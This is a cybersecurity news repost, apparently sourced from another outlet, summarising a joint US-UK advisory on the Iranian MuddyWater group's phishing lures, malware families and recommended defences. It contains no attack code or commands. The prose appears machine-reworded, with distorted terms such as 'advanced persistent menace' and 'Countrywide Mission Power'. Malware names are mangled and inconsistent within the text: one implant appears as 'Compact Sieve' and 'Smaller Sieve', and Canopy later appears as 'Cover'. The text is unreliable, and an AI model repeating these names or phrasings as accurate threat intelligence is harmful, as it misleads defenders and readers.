• Menu
  • Skip to main content
  • Skip to primary sidebar

The Cyber Security News

Latest Cyber Security News

Header Right

  • Latest News
  • Vulnerabilities
  • Cloud Services
iran's muddywater hacker group using new malware in worldwide cyber

Iran’s MuddyWater Hacker Group Using New Malware in Worldwide Cyber Attacks

You are here: Home / General Cyber Security News / Iran’s MuddyWater Hacker Group Using New Malware in Worldwide Cyber Attacks
February 25, 2022

Cybersecurity agencies from the U.K. and the U.S. have laid bare a new malware applied by the Iranian governing administration-sponsored advanced persistent menace (APT) team in attacks concentrating on government and industrial networks globally.

“MuddyWater actors are positioned both to present stolen info and accesses to the Iranian government and to share these with other malicious cyber actors,” the businesses mentioned.

The joint advisory arrives courtesy of the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Cyber Command Cyber Countrywide Mission Power (CNMF), and the U.K.’s Countrywide Cyber Security Centre (NCSC).

✔ Approved Seller From Our Partners
Malwarebytes Premium 2022

Protect yourself against all threads using Malwarebytes. Get Malwarebytes Premium with 60% discount from a Malwarebytes official seller SerialCart® (Limited Offer).

➤ Activate Your Coupon Code


The cyberespionage actor was outed this calendar year as conducting destructive operations as portion of Iran’s Ministry of Intelligence and Security (MOIS) concentrating on a large selection of government and personal-sector corporations, like telecommunications, protection, regional govt, and oil and natural gasoline sectors, in Asia, Africa, Europe, and North The united states.

Automatic GitHub Backups

MuddyWater is also tracked by the wider cybersecurity neighborhood less than the names Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros, with the group recognised for cyber offensives in assist of MOIS objectives considering that approximately 2018.

In addition to exploiting publicly reported vulnerabilities, the team has been traditionally noticed employing open up-resource applications to attain accessibility to delicate details, deploy ransomware, and realize persistence on target networks.

A abide by-on investigation by Cisco Talos late past thirty day period also uncovered a formerly undocumented malware campaign aimed at Turkish personal companies and governmental institutions with the objective of deploying a PowerShell-centered backdoor.

The new things to do unmasked by the intelligence authorities are no diverse in that they make use of obfuscated PowerShell scripts to conceal the most harming parts of the attacks, which include command-and-control (C2) features.

The intrusions are facilitated through a spear-phishing marketing campaign that attempts to coax its targets into downloading suspicious ZIP archives that either have an Excel file with a destructive macro that communicates with the actor’s C2 server or a PDF file that drops a destructive payload to the infected program.

“Additionally, the team works by using several malware sets — which includes PowGoop, Compact Sieve, Canopy/Starwhale, Mori, and POWERSTATS — for loading malware, backdoor entry, persistence, and exfiltration,” FBI, CISA, CNMF, and NCSC claimed.

Prevent Data Breaches

Even though PowGoop features as a loader dependable for downloading 2nd-stage PowerShell scripts, Smaller Sieve is described as a Python-based mostly implant applied for maintaining foothold in the network by leveraging the Telegram API for C2 communications to evade detection.

Other crucial pieces of malware are Cover, a Windows Script File (.WSF) applied to acquire and transmit method metadata to an adversary-managed IP handle, and two backdoors known as Mori and POWERSTATS that are applied to run instructions obtained from the C2 and maintain persistent access.

On top rated of that, MuddyWater has used a study script to enumerate data about target desktops, which is then despatched back to the distant C2 server. Also deployed is a recently determined PowerShell backdoor that’s applied to execute commands gained from the attacker.

To make obstacles for probable attacks, the agencies are recommending organizations to use multi-factor authentication where ever applicable, limit the use of administrator privileges, employ phishing protections, and prioritize patching recognised exploited vulnerabilities.

Discovered this article intriguing? Adhere to THN on Facebook, Twitter  and LinkedIn to study far more special content material we write-up.


Some areas of this post are sourced from:
thehackernews.com

Previous Post: «Cyber Security News Anonymous Hacking Group Declares “Cyber War” Against Russia
Next Post: IT Pro News In Review: UK likely to pay ransom, OnwardMobility shuts, and Russia blamed for hacks it pro news in review: uk likely to pay ransom,»

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Report This Article

Recent Posts

  • Russian Hackers Allegedly Compromise Ukrainian News Sites, Displaying ‘Z’ Symbol
  • A Third of Malicious Logins Originate in Nigeria
  • Open source dev attacked for spreading data-wiping ‘protestware’
  • Sandworm APT Hunts for ASUS Routers with Cyclops Blink Botnet
  • Arkansas Sues Health System for Abandoning Patient Files
  • Netflix to Charge Password Sharers
  • Hackers Target Bank Networks with new Rootkit to Steal Money from ATM Machines
  • Google Blows Lid Off Conti, Diavol Ransomware Access-Broker Ops
  • Experts Find Some Affiliates of BlackMatter Now Spreading BlackCat Ransomware
  • IT Pro News In Review: Job losses at Arm, warnings over Kaspersky software, Microsoft using ads

Copyright © TheCyberSecurity.News, All Rights Reserved.